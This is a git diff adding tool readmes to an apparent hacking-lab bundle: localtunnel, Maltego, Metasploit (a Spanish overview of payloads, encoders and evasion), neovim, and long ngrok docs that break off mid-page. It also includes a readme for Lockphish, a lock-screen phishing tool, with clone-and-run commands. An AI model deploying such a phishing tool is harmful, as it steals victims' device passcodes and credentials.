+ +```shell +lt --host http://sub.example.tld:1234 --port 9000 +``` + +You will be assigned a URL similar to `heavy-puma-9.sub.example.com:1234`. + +If your server is acting as a reverse proxy (i.e. nginx) and is able to listen on port 80, then you do not need the `:1234` part of the hostname for the `lt` client. + +## REST API + +### POST /api/tunnels + +Create a new tunnel. A LocalTunnel client posts to this enpoint to request a new tunnel with a specific name or a randomly assigned name. + +### GET /api/status + +General server information. + +## Deploy + +You can deploy your own localtunnel server using the prebuilt docker image. + +**Note** This assumes that you have a proxy in front of the server to handle the http(s) requests and forward them to the localtunnel server on port 3000. You can use our [localtunnel-nginx](https://github.com/localtunnel/nginx) to accomplish this. + +If you do not want ssl support for your own tunnel (not recommended), then you can just run the below with `--port 80` instead. + +``` +docker run -d \ + --restart always \ + --name localtunnel \ + --net host \ + defunctzombie/localtunnel-server:latest --port 3000 +``` diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/L/lockphish.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/L/lockphish.md new file mode 100755 index 00000000..cde24fab --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/L/lockphish.md @@ -0,0 +1,31 @@ +# Lockphish v1.0 + +Lockphish it's the first tool (05/13/2020) for phishing attacks on the lock screen, designed to grab Windows credentials, Android PIN and iPhone Passcode using a https link. 
+ +## Author: https://github.com/thelinuxchoice/lockphish +## Twitter: https://twitter.com/linux_choice + +![lp](https://user-images.githubusercontent.com/34893261/74437970-e5025000-4e47-11ea-9291-d83afd3fe008.png) + +### Features: + +#### Lockscreen phishing page for Windows, Android and iPhone +#### Auto detect device +#### Port Forwarding by Ngrok +#### IP Tracker + +## Legal disclaimer: + +Usage of Lockphish for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. + +### Usage: +``` +git clone https://github.com/thelinuxchoice/lockphish +cd lockphish +bash lockphish.sh +``` + +### Donate a coffee! +Support the authors: +#### Paypal: +https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=CLKRT5QXXFJY4&source=url diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/M/maltego.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/M/maltego.md new file mode 100755 index 00000000..141db0df --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/M/maltego.md @@ -0,0 +1,28 @@ +# To do a basic footprinting of a domain +Machines>"Run Machine">"Footprint L1" + +# To do a footprinting and follow the every link of a domain +Machines>"Run Machine">"Footprint L2" + +# To find a person's email address from a domain +Machines>"Run Machine">"Person - Email Address" + +# To create a custom attack +Machines>"New Machine" + +# To create a new data type +Manage>"New Entity Type" + +# To run a transform on collected data +[In the graph, right click]>"Run Transform">[Select Transform] + +# To create a new way to manipulate data +Manage>"Local Transform" + +# To get latest transforms from currently set servers +Manage>"Discover Transforms">"Discover Transforms" + +# To get transforms from specific servers +Manage>"Discover Transforms">"Discover Transforms (Advanced)" + 
+For more information with images guides going to : https://www.hackingloops.com/maltego/ diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/M/metasploit.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/M/metasploit.md new file mode 100755 index 00000000..aa7ade02 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/M/metasploit.md @@ -0,0 +1,88 @@ +The Metasploit Framework is released under a BSD-style license. + +You can find documentation on Metasploit and how to use it at: + https://docs.metasploit.com/ + +Information about setting up a development environment can be found at: + https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html + +Our bug and feature request tracker can be found at: + https://github.com/rapid7/metasploit-framework/issues + +New bugs and feature requests should be directed to: + https://r-7.co/MSF-BUGv1 + +API documentation for writing modules can be found at: + https://docs.metasploit.com/api/ + + +Quick Guide +-- +Metasploit es un framework de pruebas de penetración de código abierto que +proporciona una plataforma para desarrollar y ejecutar exploits contra sistemas +informáticos y redes. A continuación, describo brevemente cada uno de los componentes: + +Exploits: son programas o scripts que aprovechan vulnerabilidades en sistemas informáticos +o aplicaciones para obtener acceso no autorizado al sistema o para ejecutar comandos en el sistema afectado. +Los exploits se utilizan en Metasploit para automatizar la ejecución de ataques. + +Auxiliary: son módulos que no son exploits propiamente dichos, pero que proporcionan funcionalidades +adicionales para los atacantes. Por ejemplo, los módulos auxiliary pueden ser usados para escanear redes, +recolectar información del sistema, obtener acceso a credenciales o realizar ataques de denegación de servicio. + +Post: son módulos que se ejecutan después de que se ha obtenido acceso a un sistema. 
+Estos módulos permiten a los atacantes realizar acciones posteriores a la explotación de una vulnerabilidad, +como moverse lateralmente en una red, exfiltrar datos, instalar software malicioso o realizar otras +acciones para mantener el acceso al sistema. + +Payloads: son fragmentos de código que se entregan al sistema vulnerable para ejecutar un comando o realizar +una acción específica. Los payloads pueden ser utilizados en conjunto con exploits para proporcionar +una funcionalidad adicional, como obtener una shell remota, instalar un backdoor o descargar y ejecutar malware. + +Encoders: son módulos que se utilizan para ofuscar payloads y exploits para evitar la detección +por parte de software de seguridad. Los encoders utilizan técnicas de ofuscación como el cifrado, +la compresión o la modificación del código para hacer que los payloads y exploits sean más difíciles +de detectar por software antivirus y de análisis de seguridad. + +Nops: son módulos que se utilizan para agregar "no-operation" o instrucciones de "nop" al exploit o payload. +Estas instrucciones no hacen nada en el sistema objetivo, pero pueden ser utilizadas para rellenar +el espacio vacío en el código del exploit o payload. Los nops se utilizan para ajustar el tamaño del exploit +o payload para que encajen en el espacio disponible en la memoria del sistema objetivo. + +Evasion: son módulos que se utilizan para evitar la detección por parte de software de seguridad. +Los módulos de evasión se utilizan para alterar los patrones de los payloads y exploits, evitando +así la detección por parte de los sistemas de defensa y los antivirus. Los módulos de evasión +pueden utilizarse para evadir técnicas como la detección de firmas y el análisis de comportamiento. + +Msfconsole y msfvenom son dos herramientas principales en Metasploit Framework +que se utilizan para diferentes propósitos. + +Msfconsole es la interfaz de línea de comandos (CLI) principal de Metasploit. 
+Permite a los usuarios interactuar con el framework, cargar módulos, lanzar exploits, +ejecutar payloads y realizar otras acciones relacionadas con la explotación y la prueba de penetración. +Msfconsole es una herramienta interactiva que proporciona una amplia variedad de comandos para el análisis, +la explotación y la postexplotación de sistemas y redes. + +Msfvenom, por otro lado, es una herramienta independiente de la interfaz de línea de comandos +que se utiliza para generar payloads personalizados para su uso en exploits. +Los payloads son el código que se entrega al sistema objetivo después de que se ha explotado +una vulnerabilidad. Msfvenom puede generar payloads para diferentes arquitecturas de sistemas operativos +y puede codificarlos en diferentes formatos, como archivos binarios, scripts de shell, +códigos fuente y otros formatos personalizados. Los payloads generados por msfvenom se utilizan +para ejecutar comandos en sistemas remotos, obtener acceso remoto y realizar otras acciones de postexplotación. + +En resumen, mientras que msfconsole es la interfaz de línea de comandos principal para +interactuar con Metasploit, msfvenom es una herramienta especializada para generar payloads +personalizados para su uso en exploits. + + +Using Metasploit +-- +Metasploit can do all sorts of things. The first thing you'll want to do +is start `msfconsole`, but after that, you'll probably be best served by +reading [Metasploit Unleashed][unleashed], the [great community +resources](https://metasploit.github.io), or take a look at the +[Using Metasploit](https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html) +page on the documentation website. + + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/N/neovim.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/N/neovim.md new file mode 100755 index 00000000..a1f2d862 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/N/neovim.md @@ -0,0 +1,53 @@ +### What is neovim? 
+Neovim is a text editor rewrite of vim in Lua with the goal of modularizing the code to make it +more maintainable and easier to contribute to. As the official website says : +“Neovim is built for users who want the good parts of Vim, and more.” + +For more info join to : https://neovim.info + +i-Haklab pre-configue neovim with text predictible in bash, python, ruby, C++ and markdown but, +you can reconfigigure it manually following the guide in : + +> https://victorh028.github.io/NVIM/# + +Neovim Cheat Sheet in i-Haklab + + +esc **mode normal** + | ╰──➤ + | ╰──➤ + | ╰──➤ b Realiza un salto palabra en sentido contr + | ╰──➤ e Realiza un salto palabra por palabra + | ╰──➤ 0 Resliza un salto al comienso de la linea + | ╰──➤ $ Realiza un salto al final de la linea + | ╰──➤ gg Da un salto al inicio del archivo + | ╰──➤ G Da un salto al final de la linea + | ╰──➤ d Delete the current line + | ╰──➤ r Replace one character + | ╰──➤ R Heplace all the line + | ╰──➤ . Repeat the last action + | ╰──➤ u Undo the last modification one by one + | ╰──➤ U Restore all the modifications + | ╰──➤ gcc Commentingi line + | + ╰──➤ + + ╰──➤ w Save file + +a **mode editor** + +v or V **mode visual** + ╰──➤ + ╰──➤ c cut the selected text + ╰──➤ y copy the selected text + ╰──➤ p paste the selected text + +: **mode command** (only in mode normal) + ╰──➤ PlugUpdate Update the plugins + ╰──➤ PlugInstall Install the plugins + ╰──➤ PlugStatus Get neovim status + + +# Config +`~/.config/nvim/init.lua` + + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/N/ngrok.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/N/ngrok.md new file mode 100755 index 00000000..35fedddc --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/N/ngrok.md @@ -0,0 +1,5283 @@ +Documentation + +Expose a local web server to the internet + +ngrok allows you to expose a web server running on your local machine to the internet. Just tell ngrok what port your web server is listening on. 
+ +If you don't know what port your web server is listening on, it's probably port 80, the default for HTTP. +Example: Expose a web server on port 80 of your local machine to the internet + +ngrok http 80 + +If your web server is serving secure content that isn't on port 443, you can provide the full address as well. Example: Expose a secure web server on port 5001 of your local machine to the internet + +ngrok http https://localhost:5001 + +When you start ngrok, it will display a UI in your terminal with the public URL of your tunnel and other status and metrics information about connections made over your tunnel. + +The ngrok console UI +ngrok by @inconshreveable + +Tunnel Status online +Version 2.0/2.0 +Web Interface http://127.0.0.1:4040 +Forwarding http://92832de0.ngrok.io -> localhost:80 +Forwarding https://92832de0.ngrok.io -> localhost:80 + +Connnections ttl opn rt1 rt5 p50 p90 + 0 0 0.00 0.00 0.00 0.00 + +Inspecting your traffic + +ngrok provides a real-time web UI where you can introspect all of the HTTP traffic running over your tunnels. After you've started ngrok, just open http://localhost:4040">http://localhost:4040 in a web browser to inspect request details. + +Try making a request to your public URL. After you have, look back at the inspection UI. You will see all of the details of the request and response including the time, duration, headers, query parameters and request payload as well as the raw bytes on the wire. + +Detailed introspection of HTTP requests and responses + +Replaying requests +Developing for webhooks issued by external APIs can often slow down your development cycle by requiring you do some work, like dialing a phone, to trigger the hook request. ngrok allows you to replay any request with a single click dramatically speeding up your iteration cycle. Click the Replay button at the top-right corner of any request on the web inspection UI to replay it. 
Replay any request against your tunneled web server with one click + + +Installing your Authtoken + +Many advanced features of the ngrok.com service described in further sections require that you "https://dashboard.ngrok.com/signup" sign up for an account. Once you've signed up, you need to configure ngrok with the authtoken that appears on your dashboard. This will grant you access to account-only features. ngrok has a simple 'authtoken' command to make this easy. Under the hood, all the authtoken command does is to add (or modify) the auth property in your ngrok configuration file + + +Install your authtoken + +ngrok authtoken YOUR_AUTHTOKEN + + +Getting a stable URL + +On the free plan, ngrok's URLs are randomly generated and temporary. If you want to use the same URL every time, you need to upgrade to a paid plan so that you can use the subdomain option for a stable URL with HTTP or TLS tunnels and the remote-addr option for a stable address with TCP tunnels. + + +HTTP Tunnels +Custom subdomain names +ngrok assigns random hexadecimal names to the HTTP tunnels it opens for you. +This is okay for one-time personal uses. But if you're displaying the URL at a hackathon or integrating with a third-party webhook, it can be frustrating if the tunnel name changes or is difficult to read. You can specify a custom subdomain for your tunnel URL with the -subdomain switch. + +Example: Open a tunnel with the subdomain 'inconshreveable': + +ngrok http -subdomain=inconshreveable 80 +ngrok by @inconshreveable +... +Forwarding http://inconshreveable.ngrok.io -> 127.0.0.1:80 +Forwarding https://inconshreveable.ngrok.io -> 127.0.0.1:80 + + +Password protecting your tunnel +Anyone who can guess your tunnel URL can access your local web server unless you protect it with a password. You can make your tunnels secure with the-auth switch. This enforces HTTP Basic Auth on all requests with the username and password you specify as an argument. 
Example: Password-protect your tunnel + +ngrok http -auth="username:password" 8080 + + + +Tunnels on custom branded domains + +Instead of your tunnel appearing as a subdomain of ngrok.io, you can run ngrok tunnels over your domains. To run a tunnel over dev.example.com, follow these steps: + +Navigate to the Domains tab of your ngrok.com dashboard and click 'Add a domain'. Enter dev.example.com as a Reserved Domain. This guarantees that no one else can hijack your domain name with their own tunnel. +On your dashboard, click on the 'CNAME' icon to copy your CNAME target. +Create a DNS CNAME record from dev.example.com to your CNAME target. In this example, we would point the CNAME record to 2w9c34maz.cname.ngrok.io +Invoke ngrok with the -hostname switch and specify the name of your custom domain as an argument. Make sure the -region you specify matches the region in which you reserved your domain. +Example: Run a tunnel over a custom domain + +ngrok http -region=us -hostname=dev.example.com 8000 + +Accessing custom domain tunnels over HTTPS will still work, but the certificate will not match. If you have a TLS certificate/key pair, try using a TLS tunnel. + +Run a tunnel over a custom domain + +ngrok http -region=us -hostname=dev.example.com 8000 + +Accessing custom domain tunnels over HTTPS will still work,but the certificate will not match. If you have a TLS certificate/key pair, try using a TLS tunnel. + + + +Local HTTPS servers +ngrok assumes that the server it is forwarding to is listening for unencrypted HTTP traffic, but what if your server is listening for encrypted HTTPS traffic? You can specify a URL with an scheme to request that ngrok speak HTTPS to your local server. + +Forward to an https server by specifying the https:// +ngrok http https://localhost:8443 + +As a special case, ngrok assumes that if you forward to port 443 on any host that it should send HTTPS traffic and will act as if you specified an https:// URL. 
+Forward to the default https port on localhost +ngrok http 443 +ngrok assumes that your local network is private and it does not do any validation of the TLS certificate presented by your local server + + + +Rewriting the Host header +When forwarding to a local port, ngrok does not modify the tunneled HTTP requests at all, they are copied to your server byte-for-byte as they are received. Some application server like WAMP and MAMP and use the Host header for determining which development site to display. For this reason, ngrok can rewrite your requests with a modified Host header. Use the -host-header switch to rewrite incoming HTTP requests. +If rewrite is specified, the Host header will be rewritten to match the hostname portion of the forwarding address. Any other value will cause the Host header to be rewritten to that value. + +Rewrite the Host header to 'site.dev' + +
+
ngrok http -host-header=rewrite site.dev:80
+
+
Rewrite the Host header to 'example.com'
+
+
ngrok http -host-header=example.com 80
+
+

Serving local directories with ngrok's built-in fileserver

+

ngrok can serve local file system directories by using its own built-in fileserver, no separate + server needed! You can serve files using the file:// scheme when specifying the forwarding URL. +

+

All paths must be specified as absolute paths, + the file:// URL scheme has no notion of relative paths. +

+
Share a folder on your computer with authentication
+
+
ngrok http -auth="user:password" file:///Users/alan/share
+
+

File URLs can look a little weird on Windows, but they work the same:

+
Share a folder on your Windows computer
+
+
ngrok http "file:///C:\Users\alan\Public Folder"
+
+ +

Tunneling only HTTP or HTTPS

+

By default, when ngrok runs an HTTP tunnel, it opens endpoints for both HTTP + and HTTPS traffic. If you wish to only forward HTTP or HTTPS traffic, but not both, + you can toggle this behavior with the -bind-tls switch. +

+
Example: Only listen on an HTTP tunnel endpoint
+
+
ngrok http -bind-tls=false site.dev:80
+
+
Example: Only listen on an HTTPS tunnel endpoint
+
+
ngrok http -bind-tls=true site.dev:80
+
+

Disabling Inspection

+

ngrok records each HTTP request and response over your tunnels for inspection + and replay. While this is really useful for development, when you're running ngrok + on production services, you may wish to disable it for security and performance. + Use the -inspect switch to disable inspection on your tunnel. +

+
Example: An http tunnel with no inspection
+
+
ngrok http -inspect=false 80
+
+

Websockets

+

+ Websocket endpoints work through ngrok's http tunnels without any changes. + However, there is currently no support for introspecting them beyond the initial 101 + Switching Protocols response. +

+

TLS Tunnels

+

HTTPS tunnels terminate all TLS (SSL) traffic at the ngrok.com servers using ngrok.com + certificates. For production-grade services, you'll want your tunneled traffic + to be encrypted with your own TLS key and certificate. ngrok makes this extraordinarily easy + with TLS tunnels. +

+
Forward TLS traffic to a local HTTPS server on port 443
+
+
ngrok tls -subdomain=encrypted 443
+
+

Once your tunnel is running, try accessing it with curl. +

+
+
curl --insecure https://encrypted.ngrok.io
+
+

TLS Tunnels without certificate warnings

+

Notice the --insecure option in the previous curl command example? You need to specify that because + your local HTTPS server doesn't have the TLS key and certificate necessary to terminate traffic for any ngrok.io + subdomains. If you try to load up that page in a web browser, you'll notice that it tells you the page + could be insecure because the certificate does not match. +

+

If you want your certificates to match and be protected from man-in-the-middle attacks, you need two things. + First, you'll need to buy an SSL (TLS) certificate for a domain name that you own and configure your + local web server to use that certificate and its private key to terminate TLS connections. How to do + this is specific to your web server and SSL certificate provider and beyond the scope of this + documentation. For the sake of example, we'll assume that you were issued an SSL certificate for the domain + secure.example.com. +

+

Once you have your key and certificate and have installed them properly, it's now time to run a + TLS tunnel on your own custom domain name. The instructions to set this up are identical to those + described in the HTTP tunnels section: Tunnels on custom domains. The + custom domain you register should be the same as the one in your SSL certificate (secure.example.com). After + you've set up the custom domain, use the -hostname argument to start the TLS + tunnel on your own domain. +

+
Forward TLS traffic over your own custom domain
+
+
ngrok tls -region=us -hostname=secure.example.com 443
+
+

Terminating TLS connections

+

It's possible that the service you're trying to expose may not have the capability to terminate TLS connections. + The ngrok client can do this for you so that you can encrypt your traffic end-to-end but not have to worry about + whether the local service has TLS support. Specify both the -crt and -key command line + options to specify the filesystem paths to your TLS certificate and key and the ngrok client will take care of + terminating TLS connections for you. +

+
Offload TLS Termination to the ngrok client
+
+
ngrok tls -region=us -hostname secure.example.com -key /path/to/tls.key -crt /path/to/tls.crt 80
+
+

Running non-HTTP services over TLS tunnels

+

ngrok TLS tunnels make no assumptions about the underlying protocol being transported. All + examples in this documentation use HTTPS because it is the most common use case, but you can + run any TLS-wrapped protocol over a TLS tunnel (e.g. imaps, smtps, sips, etc) without any changes. +

+

Compatible Clients

+

TLS tunnels work by inspecting the data present in the Server Name Indication (SNI) extension on incoming TLS + connections. Not all clients that initiate TLS connections support setting the SNI extension data. These clients + will not work properly with ngrok's TLS tunnels. Fortunately, nearly all modern browsers use SNI. Some modern + software libraries do not though. The following list of clients do not support SNI and will not work with TLS tunnels: +

A more complete list can be found on the Server Name Indication page on Wikipedia +

+

TCP Tunnels

+

Not all services you wish to expose are HTTP or TLS based. ngrok TCP tunnels allow you to expose + any networked service that runs over TCP. This is commonly used to expose SSH, game servers, databases + and more. Starting a TCP tunnel is easy. +

+
Expose a TCP based service running on port 1234
+
+
ngrok tcp 1234
+
+

Examples

+
Expose an SSH server listening on the default port
+
+
ngrok tcp 22
+
+
Expose a Postgres server listening on the default port
+
+
ngrok tcp 5432
+
+
Expose an RDP server listening on the default port
+
+
ngrok tcp 3389
+
+

Listening on a reserved remote address

+

Normally, the remote address and port is assigned randomly each time you start a TCP tunnel. For + production services (and convenience) you often want a stable, guaranteed remote address. To do this, + first, log in to your ngrok.com dashboard and click "Reserve Address" in the "Reserved TCP Addresses" + section. Then use the -remote-addr option when invoking ngrok to bind a tunnel + on your reserved TCP address. Make sure the -region you specify matches the region in which + you reserved your address. +

+
Bind a TCP tunnel on a reserved remote address
+
+
ngrok tcp --region=us --remote-addr 1.tcp.ngrok.io:20301 22
+
+

More Tunneling Options

+

Wildcard domains

+

ngrok permits you to bind HTTP and TLS tunnels to wildcard domains. All wildcard domains, + even those that are subdomains of ngrok.io must first be reserved for your account on your dashboard. + When using -hostname or -subdomain, specify a leading asterisk + to bind a wildcard domain. +

+
Bind a tunnel to receive traffic on all subdomains of example.com
+
+
ngrok http --region=us --hostname *.example.com 80
+
+

Wildcard domain rules

+

The use of wildcard domains creates ambiguities in some aspects of the ngrok.com service. The following + rules are used to resolve these situations and are important to understand if you are using wildcard domains. +

+

For the purposes of example, assume you have reserved the address *.example.com for your account. +

+
    +
  • Connections to nested subdomains (e.g. foo.bar.baz.example.com) will route to your wildcard tunnel.
  • +
  • You may bind tunnels on any valid subdomain of example.com without creating an additional reserved domain entry.
  • +
  • No other account may reserve foo.example.com or any other subdomain that would match a wildcard domain reserved by another account.
  • +
  • Connections are routed to the most specific matching tunnel online. If you are running tunnels for both foo.example.com and *.example.com, requests to foo.example.com will always route to foo.example.com
  • +
+

Forwarding to servers on a different machine (non-local services)

+

ngrok can forward to services that aren't running on your local machine. Instead of specifying + a port number, just specify a network address and port instead. +

+
Example: Forward to a web server on a different machine
+
+
ngrok http 192.168.1.1:8080
+
+ +

The ngrok configuration file

+

Sometimes your configuration for ngrok is too complex to be expressed in command line options. ngrok supports + an optional, extremely simple YAML configuration file which provides you with the power to run multiple + tunnels simultaneously as well as to tweak some of ngrok's more arcane settings. +

+

Configuration file location

+

You may pass a path to an explicit configuration file with the -config option. This is recommended + for all production deployments. +

+
Explicitly specify a configuration file location
+
+
ngrok http -config=/opt/ngrok/conf/ngrok.yml 8000
+
+

You may pass the -config option more than once. If you do, the first configuration is parsed and + each successive configuration is merged on top of it. This allows you to have per-project ngrok configuration files + with tunnel definitions but a master configuration file in your home directory with your authtoken and other + global settings. +

+
Specify an additional configuration file with project-specific overrides
+
+
ngrok start -config ~/ngrok.yml -config ~/projects/example/ngrok.yml demo admin
+
+

Default configuration file location

+

If you don't specify a location for a configuration file, ngrok tries to read + one from the default location $HOME/.ngrok2/ngrok.yml. The configuration file + is optional; no error is emitted if that path does not exist. +

+

In the default path, $HOME is the home directory for the current user as defined by your operating system. + It is not the environment variable $HOME, although they are often the same. For + major operating systems, if your username is example the default configuration would + likely be found at the following paths: +

+ + + + + + + + + + + + + +
OS X/Users/example/.ngrok2/ngrok.yml +
Linux/home/example/.ngrok2/ngrok.yml +
WindowsC:\Users\example\.ngrok2\ngrok.yml +
+

Tunnel definitions

+

The most common use of the configuration file is to define tunnel configurations. Defining + tunnel configurations is useful because you may then start pre-configured tunnels by name + from your command line without remembering all of the right arguments every time. +

+

Tunnels are defined as mapping of name -> configuration under the tunnels property + in your configuration file. +

+
Define two tunnels named 'httpbin' and 'demo'
+
+
tunnels:
+  httpbin:
+    proto: http
+    addr: 8000
+    subdomain: alan-httpbin
+  demo:
+    proto: http
+    addr: 9090
+    hostname: demo.inconshreveable.com
+    inspect: false
+    auth: "demo:secret"
+
+
Start the tunnel named 'httpbin'
+
+
ngrok start httpbin
+
+

Each tunnel you define is a map of configuration option names to values. The name of a configuration + option is usually the same as its corresponding command line switch. Every tunnel must define + proto and addr. Other properties are available and many are protocol-specific. +

+
Tunnel Configuration Properties
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
proto + +
required
+
all
+
tunnel protocol name, one of http, tcp, tls
addr + +
required
+
all
+
forward traffic to this local port number or network address
inspect + +
http
+
enable http request inspection
auth + +
http
+
HTTP basic authentication credentials to enforce on tunneled requests
host_header + +
http
+
Rewrite the HTTP Host header to this value, or preserve to leave it unchanged
bind_tls + +
http
+
bind an HTTPS or HTTP endpoint or both (true, false, or both)
subdomain + +
http
+
tls
+
subdomain name to request. If unspecified, uses the tunnel name
hostname + +
http
+
tls
+
hostname to request (requires reserved name and DNS CNAME)
crt + +
tls
+
PEM TLS certificate at this path to terminate TLS traffic before forwarding locally
key + +
tls
+
PEM TLS private key at this path to terminate TLS traffic before forwarding locally
client_cas + +
tls
+
PEM TLS certificate authority at this path will verify incoming TLS client connection certificates.
remote_addr + +
tcp
+
bind the remote TCP port on the given address
metadata + +
all
+
arbitrary user-defined metadata that will appear in the ngrok service API when listing tunnels
+

Running multiple simultaneous tunnels

+

You can pass multiple tunnel names to ngrok start and ngrok will run them all + simultaneously. +

+
Start three named tunnels from the configuration file
+
+
ngrok start admin ssh metrics
+
+
+
ngrok by @inconshreveable
+
+Tunnel Status                 online
+Version                       2.0/2.0
+Web Interface                 http://127.0.0.1:4040
+Forwarding                    http://admin.ngrok.io -> 10.0.0.1:9001
+Forwarding                    http://device-metrics.ngrok.io -> localhost:2015
+Forwarding                    https://admin.ngrok.io -> 10.0.0.1:9001
+Forwarding                    https://device-metrics.ngrok.io -> localhost:2015
+Forwarding                    tcp://0.tcp.ngrok.io:48590 -> localhost:22
+...
+
+

You can also ask ngrok to start all of the tunnels defined in the configuration file with the + --all switch. +

+
Start all tunnels defined in the configuration file
+
+
ngrok start --all
+
+

Conversely, you may ask ngrok to run without starting any tunnels with the --none + switch. This is useful if you plan to manage ngrok's tunnels entirely via the API. +

+
Run ngrok without starting any tunnels
+
+
ngrok start --none
+
+

Example Configuration Files

+

Example configuration files are presented below. The subsequent section contains full documentation for all configuration parameters shown in these examples.

+
Run tunnels for multiple virtual hosted development sites
+
+
authtoken: 4nq9771bPxe8ctg7LKr_2ClH7Y15Zqe4bWLWF9p
+tunnels:
+  app-foo:
+    addr: 80
+    proto: http
+    host_header: app-foo.dev
+  app-bar:
+    addr: 80
+    proto: http
+    host_header: app-bar.dev
+
+
Tunnel a custom domain over both http and https with your own certificate
+
+
authtoken: 4nq9771bPxe8ctg7LKr_2ClH7Y15Zqe4bWLWF9p
+tunnels:
+  myapp-http:
+    addr: 80
+    proto: http
+    hostname: example.com
+    bind_tls: false
+  myapp-https:
+    addr: 443
+    proto: tls
+    hostname: example.com
+
+
Expose ngrok's web inspection interface and API over a tunnel
+
+
authtoken: 4nq9771bPxe8ctg7LKr_2ClH7Y15Zqe4bWLWF9p
+tunnels:
+  myapp-http:
+    addr: 4040
+    proto: http
+    subdomain: myapp-inspect
+    auth: "user:secretpassword"
+    inspect: false
+
+
Example configuration file with all options
+
+
authtoken: 4nq9771bPxe8ctg7LKr_2ClH7Y15Zqe4bWLWF9p
+region: us
+console_ui: true
+http_proxy: false
+inspect_db_size: 50000000
+log_level: info
+log_format: json
+log: /var/log/ngrok.log
+metadata: '{"serial": "00012xa-33rUtz9", "comment": "For customer alan@example.com"}'
+root_cas: trusted
+socks5_proxy: "socks5://localhost:9150"
+update: false
+update_channel: stable
+web_addr: localhost:4040
+tunnels:
+  website:
+    addr: 8888
+    auth: bob:bobpassword
+    bind_tls: true
+    host_header: "myapp.dev"
+    inspect: false
+    proto: http
+    subdomain: myapp
+
+  e2etls:
+    addr: 9000
+    proto: tls
+    hostname: myapp.example.com
+    crt: example.crt
+    key: example.key
+
+  ssh-access:
+    addr: 22
+    proto: tcp
+    remote_addr: 1.tcp.ngrok.io:12345
+
+

Configuration Options

+

authtoken +

+

This option specifies the authentication token used to authenticate this client when it connects to the ngrok.com + service. After you've created an ngrok.com account, your dashboard will display the authtoken assigned to your + account. +

+
ngrok.yml specifying an authtoken
+
+
authtoken: 4nq9771bPxe8ctg7LKr_2ClH7Y15Zqe4bWLWF9p
+
+

console_ui +

+ + + + + + + + + + + + + + + + +
true + enable the console UI
false + disable the console UI
iftty + +
default
+
enable the UI only if standard out is a TTY (not a file or pipe)
+

console_ui_color +

+ + + + + + + + + + + +
transparent + don't set a background color when displaying the console UI
black + +
default
+
set the console UI's background to black
+

http_proxy +

+

URL of an HTTP proxy to use for establishing the tunnel connection. Many HTTP proxies have connection + size and duration limits that will cause ngrok to fail. Like many other networking tools, ngrok will also + respect the environment variable http_proxy if it is set. +

+
Example of ngrok over an authenticated HTTP proxy
+
+
http_proxy: "http://user:password@proxy.company:3128"
+
+

inspect_db_size +

+ + + + + + + + + + + + + + + + +
positive integerssize in bytes of the upper limit on memory to allocate to save requests over HTTP tunnels for inspection and replay.
0 + +
default
+
use the default allocation limit, 50MB
-1 + disable the inspection database; this has the effective behavior of disabling inspection for all tunnels
+

log_level +

+

Logging level of detail. In increasing order of verbosity, possible values are: crit, warn, error, info, debug +

+

log_format +

+

Format of written log records.

+ + + + + + + + + + + + + + + + +
logfmt + human and machine friendly key/value pairs
json + newline-separated JSON objects
term + +
default
+
custom colored human format if standard out is a TTY, otherwise same as logfmt
+

log +

+

Write logs to this target destination.

+ + + + + + + + + + + + + + + + + + + + + +
stdout + write to standard out
stderr + write to standard error
false + +
default
+
disable logging
other valueswrite log records to file path on disk
+
+
log: /var/log/ngrok.log
+
+

metadata +

+

Opaque, user-supplied string that will be returned as part of the ngrok.com API response to the List Online Tunnels resource for all tunnels started by this client. This is a useful mechanism to identify tunnels by your own device or customer identifier. Maximum 4096 characters.

+
+
metadata: bad8c1c0-8fce-11e4-b4a9-0800200c9a66
+
+

region +

+

Choose the region where the ngrok client will connect to host its tunnels.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
us + +
default
+
United States
eu + Europe
ap + Asia/Pacific
au + Australia
sa + South America
jp + Japan
in + India
+

root_cas +

+

The root certificate authorities used to validate the TLS connection to the ngrok server.

+ + + + + + + + + + + + + + + + +
trusted + +
default
+
use only the trusted certificate root for the ngrok.com tunnel service
host + use the root certificates trusted by the host's operating system. You will likely want to use this option to connect to third-party ngrok servers.
other valuespath to a certificate PEM file on disk with certificate authorities to trust
+

socks5_proxy +

+

URL of a SOCKS5 proxy to use for establishing a connection to the ngrok server.

+
+
socks5_proxy: "socks5://localhost:9150"
+
+

tunnels +

+

A map of names to tunnel definitions. See Tunnel definitions for more details.

+

update +

+ + + + + + + + + + + +
true + automatically update ngrok to the latest version, when available
false + +
default
+
never update ngrok unless manually initiated by the user
+

update_channel +

+

The update channel determines the stability of released builds to update to. Use 'stable' for all production deployments.

+ + + + + + + + + + + +
stable + +
default
+
update to new stable builds when available
beta + update to new beta builds when available
+

web_addr +

+

Network address to bind on for serving the local web interface and api.

+ + + + + + + + + + + + + + + + +
network addressbind to this network address
127.0.0.1:4040 + +
default
+
default network address
false + disable the web UI
+ +

Web Inspection Interface

+

+ The ngrok client ships with a powerful realtime inspection interface which allows you to see what traffic is sent to your application server and what responses your server is returning. +

+

Inspecting requests

+

